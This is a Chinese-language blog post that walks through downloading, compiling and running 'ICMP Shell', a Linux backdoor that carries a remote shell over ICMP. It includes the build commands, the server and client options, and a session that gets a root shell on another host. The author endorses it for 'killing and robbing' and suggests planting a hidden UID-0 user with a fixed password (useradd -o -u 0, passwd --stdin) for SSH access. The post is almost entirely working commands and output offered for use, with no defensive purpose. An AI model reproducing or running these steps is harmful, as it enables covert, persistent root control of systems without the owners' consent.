linux下一个ICMP shell(backdoor)

发表于 作者 admin

项目主页:http://sourceforge.net/projects/icmpshell/

一、下载及安装

wget http://nchc.dl.sourceforge.net/project/icmpshell/ish/v0.2/ish-v0.2.tar.gz
tar zxvf ish-v0.2.tar.gz
cd ISHELL-v0.2/
make linux

最后这一步是根据操作系统类型来选择的,可选的类型有:

[root@localhost ISHELL-v0.2]# make
-------------------------------
Make with the OS from the list:
1.) linux
2.) bsd
3.) solaris
ex: make bsd
-------------------------------
[root@localhost ISHELL-v0.2]#

这里我选择make linux,编译完成后,会生成server端和client端两个程序文件。

二、用法

被控端:

[root@localhost ISHELL-v0.2]# ./ishd -h
ICMP Shell v0.2  (server)   -   by: Peter Kieltyka
usage: ./ishd [options]
options:
 -h               Display this screen
 -d               Run server in debug mode
 -i <id>          Set session id; range: 0-65535 (default: 1515)
 -t <type>        Set ICMP type (default: 0)
 -p <packetsize>  Set packet size (default: 512)
example:
./ishd -i 65535 -t 0 -p 1024

如上所示,可以指定上面的几个值 ,也可以不指定,使用默认的。

控制端:

[root@localhost ISHELL-v0.2]# ./ish -h
./ish: invalid option -- 'h'
ICMP Shell v0.2  (client)   -   by: Peter Kieltyka
usage: ./ish [options] <host>
options:
 -i <id>          Set session id; range: 0-65535 (default: 1515)
 -t <type>        Set ICMP type (default: 0)
 -p <packetsize>  Set packet size (default: 512)
example:
./ish -i 65535 -t 0 -p 1024 host.com

示例:

[root@localhost ~]# ./ish =i 1515 -t 0 -p 512 192.168.1.100
ICMP Shell v0.2  (client)   -   by: Peter Kieltyka
--------------------------------------------------
Connecting to 192.168.1.100...done.
# id
uid=0(root) gid=0(root) (root) =unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
pwd
/
ifconfig
eth0      Link encap:Ethernet  HWaddr 52:54:00:06:6D:3D
          inet addr:192.168.1.100  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::5054:ff:fe06:6d3d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:974905 errors:0 dropped:0 overruns:0 frame:0
          TX packets:170128 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:436113015 (415.9 MiB)  TX bytes:16672843 (15.9 MiB)
[root@localhost ~]# ifconfig
eth0      Link encap:Ethernet  HWaddr 52:54:00:C6:61:24
          inet addr:192.168.1.253  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::5054:ff:fec6:6124/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1585200 errors:0 dropped:0 overruns:0 frame:0
          TX packets:92714 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:209254584 (199.5 MiB)  TX bytes:15311207 (14.6 MiB)

其他不多说,杀人越货,居家必备。不过公网连接时(中间跨越多个路由交换设备时),有遇输完命令没有回显的情况。而实际上命令已经得到执行。遇到这种情况,可以通过添加用户,再用ssh进行连接,用完再删除就行了。如下,添加一个abc用户,密码为abc123:

useradd -o -u 0 abc
echo abc123 | passwd --stdin abc

发表评论

您的电子邮箱地址不会被公开。